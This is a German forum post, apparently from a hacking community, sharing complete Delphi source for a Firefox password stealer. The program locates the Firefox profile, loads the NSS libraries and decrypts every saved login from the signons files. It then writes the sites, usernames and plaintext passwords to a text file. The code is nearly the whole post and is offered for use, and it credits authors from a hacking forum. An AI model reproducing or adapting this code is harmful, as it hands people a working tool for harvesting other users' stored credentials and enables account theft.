So hier ist ne Source die Hamtaro/C0rvus gepostet hat, ich hab sie noch ein bischen editiert.
Man kann damit alle FF Pws auslesen und es wird eine Textdatei erstellt in der die Passwörter+ Hompages drin stehen.
HF
Code
- program fpwreader;
- {$APPTYPE CONSOLE}
- uses
- Windows,
- sysutils;
- var
- version : String;
- FireFoxPath: String;
- myfile:textfile;
- a,s,d,f,g:string;
- //by steve10120 from HackHound
- function ReadKeyToString(hRoot:HKEY; sKey:string; sSubKey:string):string;
- var
- hOpen: HKEY;
- sBuff: array[0..255] of char;
- dSize: integer;
- begin
- if (RegOpenKeyEx(hRoot, PChar(sKey), 0, KEY_QUERY_VALUE, hOpen) = ERROR_SUCCESS) then
- begin
- dSize := SizeOf(sBuff);
- RegQueryValueEx(hOpen, PChar(sSubKey), nil, nil, @sBuff, @dSize);
- Result := sBuff
- end;
- RegCloseKey(hOpen);
- end;
- procedure GetFFInfos;
- begin
- version := ReadKeyToString(HKEY_LOCAL_MACHINE, 'SOFTWARE\Mozilla\Mozilla Firefox', 'CurrentVersion');
- FireFoxPath:= ReadKeyToString(HKEY_LOCAL_MACHINE, 'SOFTWARE\Mozilla\Mozilla Firefox\' + version + '\Main', 'Install Directory') + '\';
- AssignFile(myFile, extractfilepath(ParamStr(0))+'xyz.txt');
- rewrite(myfile);
- closefile(myfile);
- end;
- procedure GetFirefoxPasswords(SignonsFile : String);
- type
- TSECItem = packed record
- SECItemType: dword;
- SECItemData: pchar;
- SECItemLen: dword;
- end;
- PSECItem = ^TSECItem;
- var
- NSSModule: THandle;
- NSS_Init: function(configdir: pchar): dword; cdecl;
- NSSBase64_DecodeBuffer: function(arenaOpt: pointer; outItemOpt: PSECItem; inStr: pchar; inLen: dword): dword; cdecl;
- PK11_GetInternalKeySlot: function: pointer; cdecl;
- PK11_Authenticate: function(slot: pointer; loadCerts: boolean; wincx: pointer): dword; cdecl;
- PK11SDR_Decrypt: function(data: PSECItem; result: PSECItem; cx: pointer): dword; cdecl;
- NSS_Shutdown: procedure; cdecl;
- PK11_FreeSlot: procedure(slot: pointer); cdecl;
- hToken: THandle;
- ProfilePath: array [0..MAX_PATH] of char;
- ProfilePathLen: dword;
- FirefoxProfilePath: pchar;
- MainProfile: array [0..MAX_PATH] of char;
- MainProfilePath: pchar;
- PasswordFile: THandle;
- PasswordFileSize: dword;
- PasswordFileData: pchar;
- Passwords: string;
- BytesRead: dword;
- CurrentEntry: string;
- Site: string;
- Name: string;
- Value: string;
- KeySlot: pointer;
- EncryptedSECItem: TSECItem;
- DecryptedSECItem: TSECItem;
- Result: string;
- begin
- If StrToInt(Copy(version,0,1)) < 3 Then begin
- LoadLibrary(pchar(FirefoxPath + 'nspr4.dll'));
- LoadLibrary(pchar(FirefoxPath + 'plc4.dll'));
- LoadLibrary(pchar(FirefoxPath + 'plds4.dll'));
- end else begin
- LoadLibrary(pchar(FirefoxPath + 'mozcrt19.dll'));
- LoadLibrary(pchar(FirefoxPath + 'sqlite3.dll'));
- LoadLibrary(pchar(FirefoxPath + 'nspr4.dll'));
- LoadLibrary(pchar(FirefoxPath + 'plc4.dll'));
- LoadLibrary(pchar(FirefoxPath + 'plds4.dll'));
- LoadLibrary(pchar(FirefoxPath + 'nssutil3.dll'));
- end;
- LoadLibrary(pchar(FirefoxPath + 'softokn3.dll'));
- NSSModule := LoadLibrary(pchar(FirefoxPath + 'nss3.dll'));
- @NSS_Init := GetProcAddress(NSSModule, 'NSS_Init');
- @NSSBase64_DecodeBuffer := GetProcAddress(NSSModule, 'NSSBase64_DecodeBuffer');
- @PK11_GetInternalKeySlot := GetProcAddress(NSSModule, 'PK11_GetInternalKeySlot');
- @PK11_Authenticate := GetProcAddress(NSSModule, 'PK11_Authenticate');
- @PK11SDR_Decrypt := GetProcAddress(NSSModule, 'PK11SDR_Decrypt');
- @NSS_Shutdown := GetProcAddress(NSSModule, 'NSS_Shutdown');
- @PK11_FreeSlot := GetProcAddress(NSSModule, 'PK11_FreeSlot');
- OpenProcessToken(GetCurrentProcess, TOKEN_QUERY, hToken);
- ProfilePathLen := MAX_PATH;
- ZeroMemory(@ProfilePath, MAX_PATH);
- GetEnvironmentVariable('APPDATA',ProfilePath,ProfilePathLen);
- FirefoxProfilePath := pchar(profilePath +'\Mozilla\Firefox\profiles.ini');
- GetPrivateProfileString('Profile0', 'Path', '', MainProfile, MAX_PATH, FirefoxProfilePath);
- MainProfilePath := pchar(profilePath + '\Mozilla\Firefox\' + mainProfile + '\' + signonsfile);
- PasswordFile := CreateFile(MainProfilePath, GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);
- PasswordFileSize := GetFileSize(PasswordFile, nil);
- GetMem(PasswordFileData, PasswordFileSize);
- ReadFile(PasswordFile, PasswordFileData^, PasswordFileSize, BytesRead, nil);
- CloseHandle(PasswordFile);
- Passwords := PasswordFileData;
- FreeMem(PasswordFileData);
- Delete(Passwords, 1, Pos('.' + #13#10, Passwords) + 2);
- if NSS_Init(pchar(profilePath + '\Mozilla\Firefox\' + mainProfile)) = 0 then
- begin
- KeySlot := PK11_GetInternalKeySlot;
- if KeySlot <> nil then
- begin
- if PK11_Authenticate(KeySlot, True, nil) = 0 then
- begin
- while Length(Passwords) <> 0 do
- begin
- CurrentEntry := Copy(Passwords, 1, Pos('.' + #13#10, Passwords) - 1);
- Delete(Passwords, 1, Length(CurrentEntry) + 3);
- Site := Copy(CurrentEntry, 1, Pos(#13#10, CurrentEntry) - 1);
- Delete(CurrentEntry, 1, Length(Site) + 2);
- while Length(CurrentEntry) <> 0 do
- begin
- Name := Copy(CurrentEntry, 1, Pos(#13#10, CurrentEntry) - 1);
- Delete(CurrentEntry, 1, Length(Name) + 2);
- Value := Copy(CurrentEntry, 1, Pos(#13#10, CurrentEntry) - 1);
- Delete(CurrentEntry, 1, Length(Value) + 2);
- NSSBase64_DecodeBuffer(nil, @EncryptedSECItem, pchar(Value), Length(Value));
- if PK11SDR_Decrypt(@EncryptedSECItem, @DecryptedSECItem, nil) = 0 then
- begin
- Result := DecryptedSECItem.SECItemData;
- SetLength(Result, DecryptedSECItem.SECItemLen);
- if Length(Name) = 0 then Name := '(unnamed value)';
- d:=site;
- f:='-----------------------------';
- AssignFile(myFile, 'xyz.txt');
- append(myFile);
- // Write a couple of well known words to this file
- WriteLn(myFile, d+a+Name, ' = ', Result+#13#10+f+#13#10);
- // Close the file
- CloseFile(myFile);
- end
- else
- begin
- //WriteLn('PK11SDR_Decrypt Failed!'); //scheint immer zu kommen wenn ein KeySlot fertig ist
- end
- end;
- WriteLn('-----------------------------');
- end;
- end
- else
- begin
- WriteLn('PK11_Authenticate Failed!');
- end;
- PK11_FreeSlot(KeySlot);
- end
- else
- begin
- WriteLn('PK11_GetInternalKeySlot Failed!');
- end;
- NSS_Shutdown;
- end
- else
- begin
- WriteLn('NSS_Init Failed!');
- end;
- end;
- begin
- GetFFInfos;
- GetFirefoxPasswords('signons.txt');
- GetFirefoxPasswords('signons2.txt');
- GetFirefoxPasswords('signons3.txt');
- end.